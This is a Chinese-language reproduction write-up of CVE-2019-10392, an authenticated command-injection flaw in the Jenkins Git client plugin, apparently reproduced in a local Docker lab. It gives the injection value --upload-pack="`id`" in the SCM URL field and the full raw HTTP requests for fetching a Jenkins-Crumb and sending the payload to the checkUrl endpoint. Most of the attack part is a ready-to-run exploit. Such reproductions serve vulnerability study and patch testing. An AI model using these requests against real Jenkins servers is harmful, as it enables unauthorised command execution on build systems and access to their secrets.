CVE-2019-10392 Jenkins 2k19认证远程RCE
使用以下命令在本地使用Docker启动了Jenkins实例:
docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts-alpine
版本为:Jenkins 2.176.3
git客户端:http://updates.jenkins-ci.org/download/plugins/git-client/2.8.2/git-client.hpi
git插件:http://updates.jenkins-ci.org/download/plugins/git/3.12.0/git.hpi
由于官方已经升级了client为2.8.5,git升级到3.12.1。所以需要手动上传插件,上传完成后如下。
新建用户user
为账号配置权限,作者这里没看到给了create权限,如果需要使用普通账号来创建任务测试,则需要给create权限,或者已有任务的情况下来操作已有任务也是可以的,就不用给create权限,此处用create来测试。
登陆user用户,可以看到用户界面如此
如下选择
在SCM中选择git执行
查看git-ls-remote文档,从给的参数中可以注意到–upload-pack=
https://git-scm.com/docs/git-ls-remote.html
参数的意义是:在远程主机上指定git-upload-pack的完整路径。这允许列出通过SSH访问的存储库中的引用,以及SSH守护程序不使用用户配置的PATH的位置。
如此,执行--upload-pack="`id`"
可以看到命令已经执行。
至于请求测试的话,和原作者得到写法有点出入,暂不知为何,但可以使用如下方式,请求如下,其中test2为任务名,获取Jenkins-Crumb
GET /job/test2/configure HTTP/1.1
Host: 192.168.253.139:8080
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.253.139:8080/job/test2/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: screenResolution=1536x864; JSESSIONID.b4706a48=node013tshj9ds2r3kr18mgmyaquc114.node0; JSESSIONID.83272e09=node0dt5602fpgb3a108885vr3228h9.node0
Connection: close
然后把获得的”Jenkins-Crumb”,携带到请求中
POST /job/test2/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl HTTP/1.1
Host: 192.168.253.139:8080
Content-Length: 51
Origin: http://192.168.253.139:8080
Jenkins-Crumb: b2ecec81285edce6716900a2d4e1b687
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
DNT: 1
Referer: http://192.168.253.139:8080/job/test2/configure
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: screenResolution=1536x864; JSESSIONID.b4706a48=node013tshj9ds2r3kr18mgmyaquc114.node0; JSESSIONID.83272e09=node0dt5602fpgb3a108885vr3228h9.node0
Connection: close
value=--upload-pack%3D%22%60id%60%22&credentialsId=